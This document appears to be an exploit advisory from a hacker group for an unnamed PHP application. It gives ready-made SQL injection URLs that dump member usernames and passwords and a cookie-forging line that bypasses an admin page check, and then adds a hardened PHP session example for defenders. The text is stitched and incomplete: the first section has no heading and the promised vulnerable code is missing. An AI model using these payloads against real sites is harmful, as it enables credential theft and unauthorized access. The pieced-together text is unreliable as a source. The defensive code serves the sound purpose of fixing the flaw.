#######################################################################################
#######################################################################################
Virangar Security Team
Discovered by: Virangar Security Team (hadihadi)
Special thanks to: MR.nosrati, black.shadowes, MR.hesy, Zahra
& all virangar members & all hackerz
exploit:
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/*
or
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/*
#####################
2. Remote Permission Bypass Vulnerability (Insecure Cookie Handling):
-------vuln codes in:-----------
editCss.php:
/*
If the cookie is not set for you, you are not allowed to see this page… but if we do something :) such as:
javascript:document.cookie = "pass=1; path=/";
young iranian h4ck3rz
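
The cookie issue in section 2, shown as an added example for defenders (not code from the advisory or from the affected application): the weak gate next to a server-side replacement. The vulnerable source is not reproduced on this page, so the shape of the weak check and the names is_admin_insecure, start_secure_session, login, is_admin and $storedHash are assumptions.

```php
<?php
// Added example. All function names and $storedHash are hypothetical.

// Assumed shape of the weak gate: it only tests that a client-controlled
// cookie named "pass" exists, so any value the browser sends is accepted.
function is_admin_insecure(array $cookies): bool
{
    return isset($cookies['pass']);
}

// Hardened: the browser only holds an opaque session id; the authorization
// flag itself is stored server-side and cannot be set from document.cookie.
function start_secure_session(): void
{
    session_set_cookie_params([
        'path'     => '/',
        'httponly' => true,     // not readable or writable from page script
        'secure'   => true,     // sent over HTTPS only
        'samesite' => 'Strict',
    ]);
    session_start();
}

// Call after start_secure_session(); $storedHash comes from password_hash().
function login(string $password, string $storedHash): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    session_regenerate_id(true);    // new id after privilege change
    $_SESSION['is_admin'] = true;   // server-side state
    return true;
}

function is_admin(): bool
{
    return ($_SESSION['is_admin'] ?? false) === true;
}

// Gate to place at the top of an admin-only page such as editCss.php.
start_secure_session();
if (!is_admin()) {
    http_response_code(403);
    exit('Forbidden');
}
```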